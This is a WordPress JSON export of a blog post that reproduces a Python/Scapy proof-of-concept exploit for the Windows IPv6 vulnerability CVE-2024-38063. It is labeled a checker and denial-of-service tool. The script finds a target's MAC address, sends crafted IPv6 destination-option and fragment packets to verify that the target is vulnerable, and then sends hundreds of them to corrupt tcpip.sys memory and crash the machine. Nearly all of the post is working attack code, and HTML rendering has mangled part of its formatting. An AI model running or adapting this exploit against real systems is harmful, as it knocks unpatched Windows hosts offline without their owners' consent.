{"id":59232,"date":"2024-08-29T19:59:45","date_gmt":"2024-08-29T16:59:45","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/180458\/CVE-2024-38063-dos.py.txt"},"modified":"2024-08-29T19:59:45","modified_gmt":"2024-08-29T16:59:45","slug":"microsoft-windows-ipv6-cve-2024-38063-checker-denial-of-service","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/microsoft-windows-ipv6-cve-2024-38063-checker-denial-of-service\/","title":{"rendered":"Microsoft Windows IPv6 CVE-2024-38063 Checker \/ Denial Of Service"},"content":{"rendered":"<p>#!\/usr\/bin\/env python3<br \/># -*- coding: utf-8 -*-<\/p>\n<p># Exploit Title: Windows IPv6 CVE-2024-38063 Checker and Denial-Of-Service<br \/># Date: 2024-08-07<br \/># Exploit Author: Photubias<br \/># Vendor Homepage: https:\/\/microsoft.com<br \/># Vendor Advisory: [1] https:\/\/msrc.microsoft.com\/update-guide\/vulnerability\/CVE-2024-38063<br \/># Version: Windows 10, 11 &lt;10.0.26100.1457 and Server 2016-2019-2022 &lt;10.0.17763.6189<br \/># Tested on: Windows 11 23H2 and Windows Server 2022<br \/># CVE: CVE-2024-38063<\/p>\n<p>import os, subprocess, re, time, sys<\/p>\n<p>## Variables<br \/>sDstIP = &#8216;fe80::78b7:6283:49ad:c565&#8217; ## Placeholder<br \/>if len(sys.argv) &gt; 1: sDstIP = sys.argv[1] ## Please provide an argument<br \/>sDstMAC = &#8217;00:0C:29:55:E1:C8&#8242; ## Not required, will try to get the MAC via Neighbor Discovery<br \/>iBatches = 20<br \/>iCorruptions = 20 ## How many times do we want to corrupt the tcpip.sys memory per batch<\/p>\n<p>try:<br \/>print(&#8216;&#8212; Loading Scapy, might take some time &#8230;&#8217;)<br \/>from scapy.config import conf<br \/>conf.ipv6_enabled = False<br \/>import scapy.all as scapy<br \/>scapy.conf.verb = 0<br \/>except:<br \/>print(&#8216;Error while loading scapy, please run &#8220;pip install scapy&#8221;&#8216;)<br \/>exit(1)<\/p>\n<p>import logging<br \/>logging.getLogger(&#8216;scapy.runtime&#8217;).setLevel(logging.ERROR)<\/p>\n<p>def selectInterface(): #adapter[] = npfdevice, ip, mac<br \/>def getAllInterfaces(): <br \/>lstInterfaces=[]if os.name == &#8216;nt&#8217;:<br \/>proc = subprocess.Popen(&#8216;getmac \/NH \/V \/FO csv | FINDSTR \/V \/I disconnected&#8217;, shell=True, stdout=subprocess.PIPE)<br \/>for bInterface in proc.stdout.readlines():<br \/>lstInt = bInterface.split(b&#8217;,&#8217;)<br \/>sAdapter = lstInt[0].strip(b'&#8221;&#8216;).decode()<br \/>sDevicename = lstInt[1].strip(b'&#8221;&#8216;).decode()<br \/>sMAC = lstInt[2].strip(b'&#8221;&#8216;).decode().lower().replace(&#8216;-&#8216;, &#8216;:&#8217;)<br \/>sWinguID = lstInt[3].strip().strip(b'&#8221;&#8216;).decode()[-38:]proc = subprocess.Popen(&#8216;netsh int ipv6 show addr &#8220;{}&#8221; | FINDSTR \/I Address&#8217;.format(sAdapter), shell=True, stdout=subprocess.PIPE)<br \/>try: sIP = re.findall(r'[\\w:]+:+[\\w:]+&#8217;, proc.stdout.readlines()[0].strip().decode())[0]except: sIP = &#8221;<br \/>if len(sMAC) == 17: lstInterfaces.append([sAdapter, sIP, sMAC, sDevicename, sWinguID]) # When no or bad MAC address (e.g. PPP adapter), do not add<br \/>else:<br \/>proc = subprocess.Popen(&#8216;for i in $(ip address | grep -v &#8220;lo&#8221; | grep &#8220;default&#8221; | cut -d&#8221;:&#8221; -f2 | cut -d&#8221; &#8221; -f2);do echo $i $(ip address show dev $i | grep &#8220;inet6 &#8221; | cut -d&#8221; &#8221; -f6 | cut -d&#8221;\/&#8221; -f1) $(ip address show dev $i | grep &#8220;ether&#8221; | cut -d&#8221; &#8221; -f6);done&#8217;, shell=True, stdout=subprocess.PIPE)<br \/>for bInterface in proc.stdout.readlines():<br \/>lstInt = bInterface.strip().split(b&#8217; &#8216;)<br \/>try: <br \/>if len(lstInt[2]) == 17: lstInterfaces.append([lstInt[0].decode(), lstInt[1].decode(), lstInt[2].decode(), &#8221;, &#8221;])<br \/>except: pass<br \/>return lstInterfaces<\/p>\n<p>lstInterfaces = getAllInterfaces()<br \/>if len(lstInterfaces) &gt; 1:<br \/>i = 1<br \/>for lstInt in lstInterfaces: #array of arrays: adapter, ip, mac, windows devicename, windows guID<br \/>print(&#8216;[{}] {} has {} ({})&#8217;.format(i, lstInt[2], lstInt[1], lstInt[0]))<br \/>i += 1<br \/>#sAnswer = input(&#8216;[?] Please select the adapter [1]: &#8216;)<br \/>sAnswer=&#8217;3&#8242;<br \/>else: sAnswer = None<br \/>if not sAnswer or sAnswer == &#8221; or not sAnswer.isdigit() or int(sAnswer) &gt;= i: sAnswer = 1<br \/>iAnswer = int(sAnswer) &#8211; 1<br \/>sNPF = lstInterfaces[iAnswer][0]sIP = lstInterfaces[iAnswer][1]sMAC = lstInterfaces[iAnswer][2]if os.name == &#8216;nt&#8217;: sNPF = r&#8217;\\Device\\NPF_&#8217; + lstInterfaces[iAnswer][4]return (sNPF, sIP, sMAC, lstInterfaces[iAnswer][3])<\/p>\n<p>def get_packets(iID, sDstIPv6, sDstMac=None):<br \/>iFragID = 0xbedead00 + iID<br \/>oPacket1 = scapy.IPv6(fl=1, hlim=64+iID, dst=sDstIPv6) \/ scapy.IPv6ExtHdrDestOpt(options=[scapy.PadN(otype=0x81, optdata=&#8217;bad&#8217;)])<br \/>oPacket2 = scapy.IPv6(fl=1, hlim=64+iID, dst=sDstIPv6) \/ scapy.IPv6ExtHdrFragment(id=iFragID, m = 1, offset = 0) \/ &#8216;notalive&#8217;<br \/>oPacket3 = scapy.IPv6(fl=1, hlim=64+iID, dst=sDstIPv6) \/ scapy.IPv6ExtHdrFragment(id=iFragID, m = 0, offset = 1)<br \/>if sDstMac: ## Should always be this, it seems sending to &#8216;ff:ff:ff:ff:ff:ff&#8217; does not work<br \/>oPacket1 = scapy.Ether(dst=sDstMac) \/ oPacket1<br \/>oPacket2 = scapy.Ether(dst=sDstMac) \/ oPacket2<br \/>oPacket3 = scapy.Ether(dst=sDstMac) \/ oPacket3<br \/>return [oPacket1, oPacket2, oPacket3]\n<p>def doIPv6ND(sDstIP, sInt): ## Try to get a MAC address via IPv6 Neighbour Sollicitation<br \/>sMACResp = None<br \/>oNeighborSollicitation = scapy.IPv6(dst=sDstIP) \/ scapy.ICMPv6ND_NS(tgt=sDstIP) \/ scapy.ICMPv6NDOptSrcLLAddr(lladdr=&#8217;ff:ff:ff:ff:ff:ff&#8217;)<br \/>oResponse = scapy.sr1(oNeighborSollicitation, timeout=5, iface=sInt)<br \/>if oResponse and scapy.ICMPv6NDOptDstLLAddr in oResponse:<br \/>sMACResp = oResponse[scapy.ICMPv6NDOptDstLLAddr].lladdr<br \/>return sMACResp<\/p>\n<p>lstInt = selectInterface() ## NPF, IPv6, MAC, Name<\/p>\n<p>sMAC = doIPv6ND(sDstIP, lstInt[0])<br \/>if sMAC: <br \/>print(f'[+] Target {sDstIP} is reachable, got MAC Address {sMAC}&#8217;)<br \/>sDstMAC = sMAC<br \/>elif sDstMAC != &#8221;:<br \/>print(&#8216;[-] Target not responding to Neighbor Sollicitation Packets, using the provided MAC {}&#8217;.format(sDstMAC))<br \/>else: <br \/>print(&#8216;[-] Without a MAC address, this exploit will probably not work&#8217;)<\/p>\n<p>lstPacketsToSend = []for i in range(iBatches):<br \/>for j in range(iCorruptions):<br \/>lstPacketsToSend += get_packets(j, sDstIP, sDstMAC) + get_packets(j, sDstIP, sDstMAC)<\/p>\n<p>## &#8216;send&#8217; is Layer3 (let scapy figure out the MAC address), &#8216;sendp&#8217; is L2 (MAC address is filled in, much better)<br \/>print(&#8216;[i] Verifying vulnerability against IPv6 address {}&#8217;.format(sDstIP))<br \/>## Verification first: &#8220;ICMPv6ParamProblem&#8221;<br \/>lstResp = scapy.srp1(lstPacketsToSend[0], iface=lstInt[0], timeout=5)<br \/>if lstResp and scapy.IPv6 in lstResp[0] and scapy.ICMPv6ParamProblem in lstResp[0]: <br \/>print(&#8216;[+] Yes, {} is vulnerable and exploitable for CVE-2024-38063&#8217;.format(sDstIP))<br \/>else: <br \/>input(&#8216;[-] Not vulnerable or firewall is enabled. Please verify and rerun or press enter to continue&#8217;)<br \/>print(&#8216;[i] Waiting 10 seconds to let the target cool down (more is better)&#8217;)<br \/>time.sleep(10)<br \/>input(&#8216;[?] OK, continue to execute the Denial Of Service (BSOD)? Press Ctrl+C to cancel now&#8217;)<br \/>########## Exploit<br \/>print(&#8216;[+] Sending {} packets now via interface {} {}&#8217;.format(len(lstPacketsToSend), lstInt[0], lstInt[3]))<br \/>scapy.conf.verb = 1<br \/>scapy.sendp(lstPacketsToSend, iface=lstInt[0])<br \/>print(&#8216;[+] All packets are sent, now it takes *exactly* 60 seconds for the target to crash&#8217;)<\/p>\n","protected":false},"excerpt":{"rendered":"<p>#!\/usr\/bin\/env python3# -*- coding: utf-8 -*- # Exploit Title: Windows IPv6 CVE-2024-38063 Checker and Denial-Of-Service# Date: 2024-08-07# Exploit Author: Photubias# Vendor Homepage: https:\/\/microsoft.com# Vendor Advisory: [1] https:\/\/msrc.microsoft.com\/update-guide\/vulnerability\/CVE-2024-38063# Version: Windows 10, 11 &lt;10.0.26100.1457 and Server 2016-2019-2022 &lt;10.0.17763.6189# Tested on: Windows 11 23H2 and Windows Server 2022# CVE: CVE-2024-38063 import os, subprocess, re, time, sys ## VariablessDstIP &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59232","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59232","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59232"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59232\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59232"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59232"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59232"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}